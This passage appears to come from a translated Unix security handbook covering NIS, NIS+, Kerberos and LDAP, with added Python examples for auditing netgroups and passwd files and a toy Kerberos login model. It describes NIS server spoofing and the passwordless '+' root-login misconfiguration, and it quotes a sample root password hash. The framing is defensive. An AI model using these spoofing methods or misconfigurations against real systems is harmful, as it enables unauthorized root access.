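def lint(groups):
    """Return (group, finding) pairs for definitions that deserve a second look."""
    findings = []
    for name in sorted(groups):
        kinds = {kind(t) for t in expand(groups, name)}
        if "wildcard" in kinds:
            findings.append((name, "wildcard"))   # (,,) matches every host and every user
        if {"user", "host"} <= kinds:
            findings.append((name, "mixed"))      # users and hosts in one group
    return findings


SAMPLE = """\
# the department example from the text
Math (mathserve,,) (math1,,) (math2,,) (math3,,)
Chemistry (chemserve1,,) (chemserve2,,) (chem1,,) (chem2,,) (chem3,,)
Biology (bioserve1,,) (bio1,,) (bio2,,) (bio3,,)
Science Math Chemistry Biology
# constructed groups for the checks
operators (,alice,) (,bob,)
helpdesk operators (,carol,) (math1,,)
everyone (,,)
"""


def science_hosts():
    return sorted(host for host, _user, _dom in expand(parse_netgroup(SAMPLE), "Science"))


if __name__ == "__main__":
    print(science_hosts())
    print(lint(parse_netgroup(SAMPLE)))
```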
Using netgroups to restrict the import of accounts
You can use the netgroup facility to control which accounts are imported through the /etc/passwd file. For example, if you want to import only the accounts of one particular netgroup, use the plus sign (+) and an @ sign followed by the name of the netgroup:
root:si4NOjF9Q8JqE:0:1:Mr. Root:/:/bin/sh
+@operators::999:999:::
The lines above bring in, from the NIS map, the password entries of the users listed in the operators group. Likewise, provided that you list the exclusions before the netgroups, you can exclude users or netgroups with the minus sign (-).
The +@netgroup and -@netgroup notations do not work on all versions of NIS, and on the remaining versions they have not worked reliably so far. If you intend to use these features, test your system to make sure that they behave as they should. Bear in mind that merely reading the documentation is not enough for this purpose.
NIS limitations
The use of NIS has been the starting point of many successful intrusions into Unix networks. Because NIS controls user accounts, if you can persuade an NIS server to announce across the network that you have an account, you can use that account to break into a client on that network. NIS can also make confidential information, such as encrypted passwords, available to the public.
The NIS implementations of various vendors contain several design flaws that allow a user to reconfigure and spoof the NIS system. This spoofing can be done in two ways: by spoofing the remote procedure call system, and by spoofing NIS.
RPC spoofing
Remote Procedure Call (RPC)[159] lets systems connected to a network call functions on other systems. NIS depends on the services of the RPC portmapper - a daemon that matches the names of the services offered over RPC to the IP port numbers at which those services can be contacted. Servers that use RPC register themselves with the portmapper when they start, and remove themselves from the portmapper database when they finish or are reconfigured.
In early versions of the portmapper, any program could register itself as an RPC server, which gave attackers the opportunity to register their own NIS servers and to answer requests with their own password files. Most current versions of the portmapper reject requests to register or delete a service if they come from a remote machine, or if they refer to a privileged port and come over a connection that was initiated from an unprivileged port. As a result, only the superuser can make requests to add and delete service mappings for privileged ports, and all requests can only be made locally. However, not every vendor's version of the portmapper daemon performs these checks.
Note that NFS and some NIS services are usually registered on unprivileged ports. In theory, even with the checks listed above, an attacker could replace one of these services with a specially written program so as to answer system requests in a way that compromises the security of the system.
Spoofing NIS

NIS clients obtain information from an NIS server using RPC. A local daemon named ypbind caches the contact information for the corresponding NIS server daemon, named ypserv. The ypserv daemon may be running locally or remotely.

Under early SunOS versions of the NIS service (and probably other vendors' versions), it was possible to instantiate a program that behaved like ypserv and answered ypbind requests. The local ypbind daemon could then be instructed to use that look-alike program instead of the real ypserv. An attacker could thus configure the system so that, for example, their own version of the password file was used to answer login requests!

Current NIS implementations of ypbind have a -secure or -s command-line option that can be given when the daemon is started. If this option is used, the ypbind daemon will not accept any information from ypserv servers that are not running on privileged ports. Thus, if a user tries to introduce a bogus ypserv daemon, the attempt is ignored. There is usually no good reason not to use the -secure option.

Unfortunately, the -secure option has a flaw. If an attacker can subvert the root account on any other machine attached to the local network and run a copy of ypserv with their own NIS information, then to carry out the attack they only need to point the target ypbind at that server. The compromised server may well be running on a privileged port, so its responses will not be rejected. An attacker can also write a fake ypserv that runs on a PC-compatible system. Privileged ports have no special meaning there, so any user can run the server on any port and supply information to the target ypbind process.

[159] Remote Procedure Call
NIS is confused about "+"

Even when NIS clients contact the correct servers, NIS can create other security problems. For example, a combination of mistakes in the initial development and later redevelopment of NIS has caused confusion about the NIS plus sign (+) in the /etc/passwd file.

If you use NIS, be very careful that the plus sign (+) is in the /etc/passwd file on the clients and not on the servers. On NIS servers under some versions of Unix, the plus sign can be interpreted as a username. The simplest way to avoid this problem is to make sure there is no account named "+" on the NIS server.

Figuring out what to put on the server is another problem. In early versions of NIS, the following line was also present:

+::0:0:::

which was correct on SunOS and Solaris.

Unfortunately, this very line caused a problem. When NIS was not running, the plus sign was sometimes treated as an account name, and anyone could log in to the computer by typing "+" at the login prompt and reach a command prompt without a password. Worst of all, that person logged in with the privileges of the most privileged user. [160]

One way to minimize the risk on NIS clients was to give the "+" user a password. Consider the plus sign entry in the following form:

+:*:0:0:::

Unfortunately, under some versions of NIS this entry means "import the passwd map, but change all the encrypted passwords to *", which of course prevented anyone from logging in. So this entry was not right either!

One of the simplest ways to deal with this confusion is to try logging in to your NIS clients and servers with the username "+". You can also unplug the network cable and then attempt to log in, to simulate what happens to the computer when the NIS server is unreachable. In neither case should you be able to log in merely by typing "+" as the username. This test will tell you whether the server is configured correctly.

If you are running a recent version of your operating system, do not assume that your system is immune to the NIS subsystems' confusion over "+". In particular, some versions of NIS on Linux make this mistake as well.

[160] In Sun's implementation of NIS, and perhaps some other implementations, this risk can be mitigated to some extent by preventing the UID and GID values of the NIS entries in the passwd file from being changed to zero, or to other values, by local users.
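The pitfalls described above for "+" and "-" entries can be checked mechanically before a passwd file is deployed. The following is an added example, not code from the handbook: the function name, finding codes and the third and fourth sample lines are this example's own assumptions, and it only inspects text, so the login test described above is still needed.

```python
# Added example: audit passwd-format text for the NIS "+" pitfalls described above.
# Finding codes and messages are this example's own, not output of any NIS tool.

SAMPLE_CLIENT_PASSWD = """\
root:si4NOjF9Q8JqE:0:1:Mr. Root:/:/bin/sh
+@operators::999:999:::
-baduser::::::
+::0:0:::
"""  # constructed sample; the first two lines are the ones shown in the text


def audit_passwd(text, is_nis_server=False):
    """Return (line_number, code, message) findings for NIS +/- entries."""
    findings = []
    seen_import = False  # set once a "+" import line has been read

    def report(lineno, code, message):
        findings.append((lineno, code, message))

    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        name = fields[0]
        if not name.startswith(("+", "-")):
            continue  # ordinary local account, not an NIS directive
        passwd = fields[1] if len(fields) > 1 else ""
        uid = fields[2] if len(fields) > 2 else ""

        if is_nis_server:
            report(lineno, "SERVER_PLUS",
                   "NIS directive on a server; it may be read as a username")
        if name.startswith("-"):
            if seen_import:
                report(lineno, "EXCLUDE_AFTER_IMPORT",
                       "exclusions must be listed before the imports")
            continue
        seen_import = True
        if name.startswith("+@"):
            report(lineno, "NETGROUP_UNTESTED",
                   "netgroup notation is unreliable on some NIS versions; test it")
            continue
        if name == "+":
            if passwd == "":
                report(lineno, "PLUS_EMPTY_PASSWORD",
                       "if NIS is down, '+' may log in without a password")
            elif passwd == "*":
                report(lineno, "PLUS_STAR_PASSWORD",
                       "some NIS versions turn every imported password into '*'")
            if uid == "0":
                report(lineno, "PLUS_UID_ZERO",
                       "a '+' login would have superuser privileges")
    return findings


def codes(findings):
    """Drop the messages so results are easy to compare."""
    return [(lineno, code) for lineno, code, _ in findings]


if __name__ == "__main__":
    for lineno, code, message in audit_passwd(SAMPLE_CLIENT_PASSWD):
        print(f"line {lineno}: {code}: {message}")
```
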
Improving NIS security

The NIS database contains sensitive information. There are several ways to prevent unauthorized disclosure of the information in the NIS database. As with most security improvements, you can combine several of these methods to obtain a layered defense in depth [161]:

1. Protect your site with a firewall, or at least a smart router, and do not allow RPC-related UDP packets to pass between your internal network and the outside world. Unfortunately, because RPC is based on the portmapper, the actual UDP port in use is not a fixed, known port. In practice, the only safe strategy is to block all UDP packets except those that you specifically allow.

2. Use a version of the portmapper that can maintain a list of computers (by hostname or IP address) whose access to particular RPC servers is to be allowed or denied. If you do not have a firewall, an attacker can still probe for the existence of each RPC service without going through the portmapper; but if RPC clients first try to contact the portmapper, an improved version of NIS can warn of a potential attack.

3. Check whether your NIS uses the /var/yp/securenets file on NIS servers. If this file exists, it can specify a list of networks that are allowed to receive NIS information. Other versions of NIS probably offer other ways for ypserv to filter the addresses that are allowed to access a particular RPC server.

4. Do not use NIS so heavily that you forget about DNS! If your policy is that nobody outside should be able to learn your organization's IP addresses, set up two nameservers [162]: one for internal use and one for external use.
Sun's NIS+

NIS was designed for small, friendly computing environments. When Sun Microsystems' customers began building networks with thousands of workstations, it became clear that NIS was impractical and insecure for use by large companies. In 1990 Sun Microsystems began developing a replacement for NIS, and a few years later the system was released under the name NIS+.

NIS+ quickly gained a reputation for being broken, and its early releases appeared to have gone practically untested, since they rarely worked as intended. Beyond that, its documentation was very confusing and incomplete. Sun eventually fixed its defects, so that today NIS+ is a more reliable system for secure network management and control. An excellent reference for people using NIS+ is the book All About Administering NIS+ [163] by Rick Ramsey [164].

[161] Layered Defense-in-Depth
[162] Nameserver
[163] All About Administering NIS+ (SunSoft Press, Prentice Hall, 1994)
[164] Rick Ramsey
What NIS+ does

NIS+ creates network databases that are used to store information about the organization's computers and users. NIS+ calls these databases "tables". These tables are functionally similar to NIS maps. Unlike NIS, NIS+ allows incremental updates [165] of the information over the network.

Every NIS+ domain has exactly one NIS+ root server [166]. This is a computer that holds the master copy of the information stored in the NIS+ root domain [167]. The information stored on this server can be replicated, which allows the network to remain usable even when the root server is down or unreachable. NIS+ servers can also be used for subdomains.

Entities that communicate using NIS+ are called NIS+ principals [168]. An NIS+ principal may be a host or an authenticated user. Each NIS+ principal has a public key and a private key, which are stored on an NIS+ server in the domain.

All communication between NIS+ servers and principals takes place over "Secure RPC", a version of RPC that authenticates and protects procedure calls using DES encryption. This makes the communication resistant to eavesdropping and spoofing attacks. NIS+ also oversees the creation and management of Secure RPC keys. With NIS+, every member of the organization is able to use Secure RPC.

NIS+ tables and related matters

All information stored on NIS+ servers is stored in the form of objects [169]. NIS+ supports three fundamental kinds of objects. "Tables" store configuration information; "groups" refer to sets of NIS+ principals and are used for authenticating them; and "directories" are containers for tables, groups, and other directories, and give the NIS+ server a tree structure.

NIS+ predefines 16 tables, including tables for hosts and networks, protocols and services, user accounts and passwords, user groups and netgroups, e-mail aliases, and others. Users are free to create additional tables of their own.

Using NIS+

Using NIS+ can be very satisfying. When a user logs in to a workstation, the login program automatically retrieves the user's NIS+ security credentials and attempts to decrypt them with the user's password.

If the password entered matches the password stored in NIS+ (which is usually the case), the NIS+ keyserv process caches the user's private key, and the user gains transparent access to all Secure RPC services (in other words, the intermediate authentication layer becomes invisible). If the password entered does not match the password stored in NIS+, the user must log in to the NIS+ domain manually with the keylogin command. NIS+ users change their passwords with the nispasswd command, which works much like the standard Unix passwd command.

[165] Incremental Update
[166] NIS+ Root Server
[167] NIS+ Root Domain
[168] NIS+ Principals
[169] Objects
NIS+ security is implemented by providing a means of authenticating users, and by establishing access control lists that govern the ways in which authenticated users can interact with the information stored in NIS+ tables. NIS+ provides two kinds of authentication: local authentication is based on the UID under which an NIS+ command is executed and is used extensively for administering NIS+ root servers, while DES authentication is based on Secure RPC.

Every NIS+ object has an "owner", which is usually its creator (an object's owner can be changed with the nischown command). NIS+ objects also have access control lists, which are used to control which principals have what kind of access to the object: read, modify, create, delete, or merge. Four kinds of principals can have access to an object: nobody (unauthenticated requests), the object's owner, principals in the same group as the object, and other authenticated principals.

NIS+ tables may grant additional access rights to their individual rows, columns, or entries. Thus all authenticated users have read access to every part of a table, but each user can modify only the row that belongs to their own account. Note that because the access rights on rows, columns, and individual entries can only broaden the access control list, more restrictive rules cannot be applied.

Limitations of NIS+

If NIS+ is configured correctly, it can be a very secure system for authentication and network management. Nevertheless, as with all security systems, a mistake can be made in the configuration or administration of NIS+ that results in weakened security for the network that NIS+ protects. Some points to be aware of are listed below:

Do not run NIS+ in NIS compatibility mode [170]

NIS+ has an "NIS compatibility" mode that allows an NIS+ server to interoperate with NIS clients. If you run NIS+ in this mode, any NIS server on your network (and perhaps on other networks as well) will be able to obtain any piece of information stored on the NIS+ server.

Manually inspect the access rights of your NIS+ objects at regular intervals

There is not yet any integrity-checking software for NIS+, so NIS+ tables, directories, and groups must be inspected manually at regular intervals. Watch for objects that can be modified by nobody or by everybody, and for tables in which these two classes of principals can create new objects.

Secure the computers on which your NIS+ servers run

An NIS+ server is at most as secure as the computer on which it runs. If attackers can obtain "root" access on an NIS+ server, they can make any change they like to the NIS+ domain, including creating new users, changing users' passwords, and even changing the NIS+ server's master password.

[170] NIS Compatibility Mode
Use NIS+ security level 2 on your servers

NIS+ servers can operate at three security levels, named 0, 1, and 2. Full authentication and access control are enabled only at level 2, and NIS+ servers should only be run at level 2.

Kerberos

In the late 1980s, at the Massachusetts Institute of Technology (MIT) [171], hundreds of powerful workstations with large displays, fast (for the time) processors, small disks, and Ethernet interfaces replaced an older system that consisted of terminals and a few timesharing [172] computers. The goal was for users to be able to reach their files and the network from any of the computers.

As soon as the workstations went into service, the problem of network eavesdropping became painfully apparent. Because the network was accessible from everywhere, nothing prevented students (or attackers from outside the institute) from using network-sniffing programs. It was almost impossible to prevent students from learning the workstations' root password or rebooting them in single-user mode. Complicating matters further, many of the computers attached to the network were IBM PC/ATs running software that lacked even rudimentary computer security. Something had to be done to protect students' files on the network at least as well as they had been protected on the previous, timesharing system.

MIT's eventual solution to this security problem was "Kerberos", an authentication system that used DES cryptography to protect sensitive information, such as passwords, on open networks. When a user logs in to a workstation running Kerberos, the Kerberos server issues that user a "ticket". The user's ticket can be opened only with the user's password and contains the information needed to obtain further tickets. From then on, whenever the user wants to access a network service, they must present a ticket specific to that service. Because all the information in Kerberos tickets is encrypted before it is sent over the network, the transmitted information cannot be eavesdropped on either.

Kerberos 4 and Kerberos 5

Kerberos has undergone five major revisions in its history, and two versions of Kerberos are currently in use in the marketplace.

Kerberos 4 is more efficient than Kerberos 5 but more limited. For example, Kerberos 4 can only work over TCP/IP networks, has not been upgraded for several years, and is now considered obsolete. In early 1996, graduates of the COAST laboratory at Purdue University (which merged with the CERIAS research center in 1998) discovered a deep weakness in the way Kerberos 4 keys were generated, which allowed an attacker to guess session keys within a few seconds. Although a fix for this vulnerability was widely distributed, it has emerged that some Kerberos 4 implementations are also vulnerable to buffer overflow attacks, for which no fix has been released.

Kerberos 5 fixed the known problems of the Kerberos protocol and made it more resistant to common network attacks. Kerberos 5 is also more flexible and can work with other kinds of networks. Kerberos 5 also has provisions for working with encryption algorithms other than DES. Although algorithms such as triple DES have been implemented, they are not widely used, mostly because of legacy programs that have used encryption.

Finally, Kerberos 5 has several new features as well: delegation of authentication, tickets with expiration times longer than 21 hours, renewable tickets, tickets that become valid at some time in the future, and many other options. If you intend to use Kerberos, Kerberos 5 is recommended. The IETF has worked on revising and clarifying RFC 1510, which defines Kerberos 5, and has proposed several anticipated extensions to the protocol.

[171] Massachusetts Institute of Technology
[172] Timesharing
Kerberos authentication

Authentication in Kerberos is based entirely on knowledge of passwords that are stored on the Kerberos servers. Unlike Unix passwords, which are encrypted with a one-way algorithm, a Kerberos password is stored on the server encrypted with a conventional algorithm (in most cases DES), so it can be decrypted by the server when needed. The user, for their part, proves their identity to the Kerberos server by demonstrating knowledge of the key in use.

The fact that the Kerberos server has access to the user's decrypted password is a consequence of the fact that Kerberos does not use public key cryptography. [173] This is a serious shortcoming of the Kerberos system. It means that the server must be both physically secure and "computationally secure". The server must be physically secure to prevent it from being stolen and all the users' passwords disclosed. The server must also be immune to login attacks, because if an attacker can log in to the server and obtain "root" access, they can likewise steal all the passwords.

Kerberos was designed so that its server could be stateless. The server simply answers users' requests and issues tickets whenever required. This design makes it relatively easy to set up replicated, secondary servers that can answer authentication requests when the primary server is unavailable. Unfortunately, these secondary servers need complete copies of the entire Kerberos database, which means that they too must be both physically and computationally secure.
Initial login

For the user, logging in to a workstation that uses Kerberos looks just like logging in to an ordinary computer system: the user types a username and password, and if they are correct the user is logged in and has access to files, e-mail, printers, and other such resources.

What happens behind the scenes is of course much more complicated. When the workstation's login program, sshd [174], or an authentication library such as PAM (or another network daemon) is Kerberos-aware, it uses the Kerberos system to authenticate the user.

[173] Public key cryptography is not used in Kerberos because it was still protected by intellectual property law when Kerberos was developed. There is an IETF draft proposal, introduced as "Public Key Cryptography for Initial Authentication in Kerberos", that presents methods for integrating public-key smart cards with Kerberos. This proposal has been implemented by Microsoft.

[174] OpenSSH patches for using Kerberos 5 for authentication are available at the following address:
http://www.sxw.org.uk/computing/patches/openssh.html
Although SSH has also been used alongside Kerberos 4, it is very difficult to get the two systems to interoperate. Fortunately, version 2 of the SSH protocol can use the same security layer as Kerberos 5 (GSSAPI), which simplifies matters considerably. The IETF draft proposal that covers the integration of these systems is draft-ietf-secsh-gsskeyex.
First, the Kerberos client must know how to find the Kerberos server. For this purpose each client can be configured manually (traditionally in the krb5.conf file), or the Kerberos servers can be advertised with DNS SRV records, as described in the IETF Internet-Draft draft-ietf-krv-wg-krb-dns-locate.

In Kerberos 4, after you enter your username, the workstation sends a message to the Kerberos authentication server. [175] This message contains your username and indicates that you are trying to log in. The Kerberos server checks its database for your record and, if you are recognized as a valid user, sends you a ticket granting ticket that is encrypted with a digest of your password. The workstation then asks you to enter your password and finally attempts to decrypt the encrypted ticket with the password you supplied. If the decryption succeeds, the workstation does not store your password and uses the ticket granting ticket exclusively. If the decryption fails, the workstation knows that you supplied the wrong password and asks you to try again to enter the correct one.

In Kerberos 5, the workstation waits until you have entered your password before contacting the server. It then sends the Kerberos authentication server a message containing your username and the current date, encrypted with your password. The server looks up your username, finds your password, and attempts to decrypt the encrypted date. If the server can decrypt the date that was sent (in which case, naturally, the date will be the current date), it creates a ticket granting ticket, encrypts it with your password, and sends it to you. [176]

The ticket granting ticket is a block of data containing a session key and a ticket for the Kerberos ticket granting service, encrypted with both the session key and the ticket granting service's key. The user's workstation can now contact the Kerberos ticket granting service to obtain tickets for any principal within the Kerberos realm, that is, the set of servers and users known to the Kerberos server.

For example, when the user first tries to access their files through a Kerberos workstation, the system software on the workstation contacts the ticket granting service and requests a ticket for the file server. The ticket granting service returns to the user a ticket for the file server. The ticket that is sent contains another ticket, encrypted with the file server's password, which the user's workstation can present to the file server to request files. That ticket contains the user's authenticated name, an expiration time, and the Internet address of the user's workstation. The user's workstation then presents this ticket to the file server. The file server decrypts the ticket using its own password and then builds a mapping between the user's workstation (UID, IP address) and a UID on the file server. Kerberos puts the time of day in requests to prevent a request from being captured and retransmitted later from the same host (for example, in a replay attack by an eavesdropping attacker).

[175] According to the Kerberos papers and documentation, there are logically two kinds of Kerberos server: the authentication server and the ticket granting service. Some commentators consider this view inaccurate, because physically every Kerberos system uses only a single server: the Kerberos server, or key server.

[176] Why did the protocol change? Kerberos 4 tried to minimize the number of times the user's password was stored on the workstation. Unfortunately, this made it easy to guess Kerberos 4 ticket granting ticket passwords offline. In Kerberos 5 the workstation must demonstrate to the Kerberos authentication server that the user knows the correct password. This is a more secure system, although because the user's encrypted ticket granting ticket is sent from the server to the workstation, it can still be captured by an attacker and attacked with an exhaustive key search.
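The difference between the Kerberos 4 and Kerberos 5 initial exchanges described above can be seen in a small model. This is an added example, not code from the handbook or from any Kerberos implementation: ToyKDC, seal/unseal and the other names are hypothetical, an HMAC-based toy cipher stands in for DES, PBKDF2 stands in for the real password-to-key function, and a timestamp in seconds stands in for the date.

```python
import hashlib
import hmac
import os
import struct
import time

MAX_SKEW = 300               # seconds of clock difference tolerated (assumed value)
TICKET_LIFETIME = 8 * 3600   # assumed ticket lifetime of 8 hours


def string_to_key(password, salt):
    """Derive a key from a password (PBKDF2 stands in for the real function)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), 10_000)


def _subkey(key, label):
    return hmac.new(key, label, hashlib.sha256).digest()


def _keystream(key, nonce, length):
    blocks = [hmac.new(key, nonce + struct.pack(">I", i), hashlib.sha256).digest()
              for i in range((length + 31) // 32)]
    return b"".join(blocks)[:length]


def seal(key, plaintext):
    """Toy authenticated encryption; a stand-in for DES, not for real use."""
    nonce = os.urandom(16)
    stream = _keystream(_subkey(key, b"enc"), nonce, len(plaintext))
    ciphertext = bytes(a ^ b for a, b in zip(plaintext, stream))
    tag = hmac.new(_subkey(key, b"mac"), nonce + ciphertext, hashlib.sha256).digest()
    return nonce + ciphertext + tag


def unseal(key, blob):
    """Return the plaintext, or None if blob was not sealed with this key."""
    if len(blob) < 48:
        return None
    nonce, ciphertext, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(_subkey(key, b"mac"), nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    stream = _keystream(_subkey(key, b"enc"), nonce, len(ciphertext))
    return bytes(a ^ b for a, b in zip(ciphertext, stream))


class ToyKDC:
    """Authentication server holding every user's key, as the text describes."""

    def __init__(self, passwords):
        self.user_keys = {u: string_to_key(p, u) for u, p in passwords.items()}
        self.tgs_key = os.urandom(32)    # key of the ticket granting service

    def _reply(self, user, now):
        session_key = os.urandom(32)
        expiry = struct.pack(">Q", now + TICKET_LIFETIME)
        tgt = seal(self.tgs_key, session_key + expiry + user.encode())
        # The reply can only be opened with the key derived from the password.
        return seal(self.user_keys[user], session_key + tgt)

    def as_request_v4(self, user, now):
        """Kerberos 4 style: a username alone is enough to receive a reply."""
        return self._reply(user, now) if user in self.user_keys else None

    def as_request_v5(self, user, sealed_time, now):
        """Kerberos 5 style: the request must carry the time sealed with the user's key."""
        key = self.user_keys.get(user)
        plaintext = unseal(key, sealed_time) if key else None
        if plaintext is None or len(plaintext) != 8:
            return None                  # unknown user or wrong password
        (sent,) = struct.unpack(">Q", plaintext)
        if abs(now - sent) > MAX_SKEW:
            return None                  # stale request, possibly a replay
        return self._reply(user, now)


def login_v5(kdc, user, password, now=None):
    """Workstation side: returns (session_key, tgt) or None."""
    now = int(time.time()) if now is None else now
    key = string_to_key(password, user)
    reply = kdc.as_request_v5(user, seal(key, struct.pack(">Q", now)), now)
    body = unseal(key, reply) if reply else None
    if body is None:
        return None
    return body[:32], body[32:]
```

In the model, as_request_v4 hands a password-sealed reply to anyone who names a user, which is the offline-guessing exposure footnote 176 refers to, while as_request_v5 refuses to reply until the requester has shown knowledge of the key.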
Kerberos has several security advantages. Passwords are stored on the Kerberos server rather than on individual workstations, and they are never transmitted over the network, encrypted or otherwise. The Kerberos authentication server can authenticate the user because the user knows their password, and likewise the user can authenticate the Kerberos server because that server also knows the user's password. Other Kerberos services can also authenticate the user, because the user presents a ticket issued by the ticket granting service that is encrypted with the destination service's key.

An eavesdropper who steals a ticket from the Kerberos server cannot use it, because it is encrypted with a key (the key of a Kerberos service, or one derived from the user's password) that the attacker does not know.

Authentication, data integrity, and secrecy

Kerberos is a general-purpose system for sharing principals' private keys over a network. Ordinarily Kerberos is used only for authentication. However, the ability to exchange keys can also be used to ensure the integrity and secrecy of data.

If eavesdropping is a serious threat, all the information passing between the workstation and the service can be encrypted with a key exchanged between the two principals. Unfortunately, encryption reduces performance. At MIT, encryption is used for transferring highly sensitive information such as passwords, but not for most data transfers, such as files and e-mail.

Tickets issued by Kerberos expire after 8 hours, a technique intended to prevent replay attacks. [177] So after 8 hours you must run the kinit program again and enter your username and password once more so that the Kerberos ticket granting service issues you a new ticket.

On single-user workstations, Kerberos adds considerably more security on top of ordinary passwords; however, if two people are logged in to a workstation at the same time, the workstation authenticates both users, and from then on the two users will be able to impersonate each other. This threat was considered very important at MIT, so remote login services were disabled on workstations to prevent attackers from logging in while a legitimate user was authenticated. It is also possible for someone to subvert the local software in order to capture the user's password as it is typed.
Getting Kerberos

Kerberos security systems, or systems like it, are available today from several companies, and are also a standard part of operating systems such as Solaris, Mac OS X, and many versions of Linux and BSD. Microsoft Windows has included a version of Kerberos 5 since Windows 2000. It is also possible to use Kerberos between Unix machines and Windows platforms. [178]

If you have to install Kerberos from scratch, the MIT Kerberos source code is available to citizens of the United States and Canada at http://web.mit.edu/kerberos/www/ and to others at http://www.crypto-publish.org. At these addresses you can also find official updates, patches, and bug announcements. Kerberos has had several known bugs, so it is very important to use the latest version. There is also a free implementation of Kerberos called "Heimdal", which is under active development and is highly compatible with MIT Kerberos. You can obtain Heimdal from http://www.pdc.kth.se/heimdal/. The configuration changes needed to adapt Kerberos to your system are critical; if you have to make them yourself, refer to the documentation supplied with Kerberos for more information.

[177] In some configurations a maximum lifetime for the key can be set.

[178] Bear in mind that Microsoft has made proprietary changes to the Kerberos protocol whose effect is to force Windows clients to use Windows Kerberos servers. In a mixed Windows and Unix environment, therefore, it is better for the Kerberos servers to be Windows 2000 machines, so that both Windows clients and Unix clients can be used.
Kerberos and LDAP

Kerberos and LDAP (described in the next section) combine well. Kerberos can be used to authenticate and secure LDAP queries and updates. The LDAP database, in turn, can store user information that is richer than the data protected by Kerberos alone, such as the user's home directory, shell, telephone number, or other organizational information. Together, the two services can provide all the functionality of NIS and NIS+, which is why they are very widely used. [179]

LDAP is sometimes used to store Kerberos keys. The Windows implementation of Kerberos uses Microsoft Active Directory services (an implementation of LDAP) to store Kerberos keys. Heimdal Kerberos supports this capability, but MIT Kerberos does not; this is no cause for concern, however, because in MIT Kerberos these keys are stored on the Kerberos servers themselves.
‫ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ‪Kerberos‬‬
‫ﺍﮔﺮﭼﻪ ‪ Kerberos‬ﻳﻚ ﺭﺍﻩ ﺣﻞ ﻋﺎﻟﻲ ﺑﺮﺍﻱ ﻳﻚ ﻣﺸﻜﻞ ﺍﺳﺎﺳﻲ ﺍﺳﺖ ﺍﻣﺎ ﻫﻨﻮﺯ ﻫﻢ ﻧﻘﺎﻳﺺ ﺯﻳﺎﺩﻱ ﺩﺍﺭﺩ ﮐـﻪ ﺩﺭ ﺫﻳـﻼ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺷـﺎﺭﻩ‬
‫ﻣﻲﺷﻮﺩ‪:‬‬
Every network service must be individually modified to work with Kerberos
Because of the way Kerberos is designed, every program that is to use Kerberos must be modified. The process of making these modifications to an application is usually called "Kerberizing". Doing so usually requires that the application's source code be available, or that the application use a security framework that has already been integrated with Kerberos (such as PAM, which is discussed at the end of this chapter).
Kerberos does not work well in a time-sharing environment
Kerberos was designed for an environment in which each workstation has a single user. If a user shares a computer with several other people, the user's ticket can be stolen by an attacker. The stolen tickets can then be put to fraudulent use.
Kerberos requires a secure and available Kerberos server
By design, Kerberos requires a secure central server that holds the master password database and is continuously available. To guarantee security, organizations must use that machine for absolutely nothing other than the Kerberos server. The Kerberos server must always be kept under lock and key in a physically secure environment. If the Kerberos server goes down, the entire Kerberos network becomes unusable.
The Kerberos server stores all passwords encrypted with the server's master private key, which is located on the same hard disk as the encrypted passwords. This means that if the Kerberos server is compromised, all user passwords must be changed.
179 Jason Heiss provides a good guide to these programs on a page of his website titled "Replacing NIS with Kerberos and LDAP", at http://www.ofb.net/~jheiss/krbldap.
Kerberos overlooks modifications to system software (Trojan horses)
Kerberos does not make the local workstation authenticate itself to the user; that is, the user sitting at the computer has no way of knowing whether the computer has been compromised. An attacker who is aware of this weakness can easily exploit it. These problems follow from the fact that, even on a network, many workstations hold local copies of the programs they run.
Kerberos can create a cascading loss of trust
If the password of a server or a user is disclosed, an eavesdropper can use that password to decrypt other tickets and use that information to spoof servers and users.
Kerberos is a workable system for network security and is widely used; more importantly, its basic principles are increasingly found in network security systems that are available directly from vendors.
‫‪LDAP‬‬
The Lightweight Directory Access Protocol (LDAP) is a low-overhead version of the X.500 directory access service, used to store directory information (such as authentication systems, user identifiers, and passwords) that is accessed over a secure network channel. There are two main versions of LDAP. LDAPv2, described in 1995 in RFC 1777, provides no particular security mechanism for passwords unless its implementation works together with Kerberos. LDAPv3, described in RFC 2251, also supports SASL.[180] SASL offers several other methods for securing password authentication (including Kerberos!). In addition, both the widely used open-source implementation of LDAPv3 (OpenLDAP 2.x) and the most widely used commercial implementation (Microsoft's Active Directory, in versions beginning with Windows 2000) support the use of SSL/TLS to secure the entire communication link between client and server, including the authentication exchanges.
LDAP by itself provides many general-purpose directory services. For example, many organizations use LDAP to organize employees' telephone numbers, e-mail addresses, and address lists. We discuss LDAP in this chapter because it can form the basis of a network information and authentication system, and because it is increasingly used for these purposes, particularly on Windows and Linux systems.
The LDAP Protocol
The information on an LDAP server is organized as a tree of entries, each of which belongs to one or more object classes and contains attributes that hold its values. Each entry contains an attribute named "cn" (common name)[181] that distinguishes it from the other entries with the same parent in that tree.
‫‪180 Simple Authentication and Security Layer, RFC 2222‬‬
‫‪181 Common Name‬‬
For example, an entry belonging to the "posixAccount" object class contains attributes that specify the user's full name (cn), login name (uid), user ID number and group ID number (uidNumber and gidNumber), home directory (homeDirectory), login shell (loginShell), and other user information.
In LDAP terminology, a schema[182] is a collection of object classes[183] and attribute definitions that are logically related. The posixAccount object class is defined in the network information service schema (nis.schema).
LDAP is a client-server protocol. An LDAP client sends requests to an LDAP server and receives its responses. Clients can send requests to make a modification, to perform a search, to return one or more attributes of a particular entry, or to return an entire subtree of the entries held in the server's store.
Integrity and Reliability
Modern LDAP servers (such as Active Directory or OpenLDAP 2.x) provide several important features to ensure data integrity and system reliability:
Data integrity and confidentiality
An LDAP server can accept TLS-secured connections and can provide end-to-end encryption[184] for client-server interactions. In addition, TLS makes unauthorized modification of the information impossible.
Server authentication
To support TLS, the LDAP server is assigned a cryptographic public key that is signed by a certification authority. With that certificate, LDAP clients can be sure that they are communicating with the server they intended to reach.
Client authentication
LDAP servers can also require TLS certificates from clients, to ensure that only authorized clients can query or update the server.
Replication
An LDAP server can replicate its entire LDAP data store onto secondary servers, so that critical LDAP information is not lost if the primary server fails.
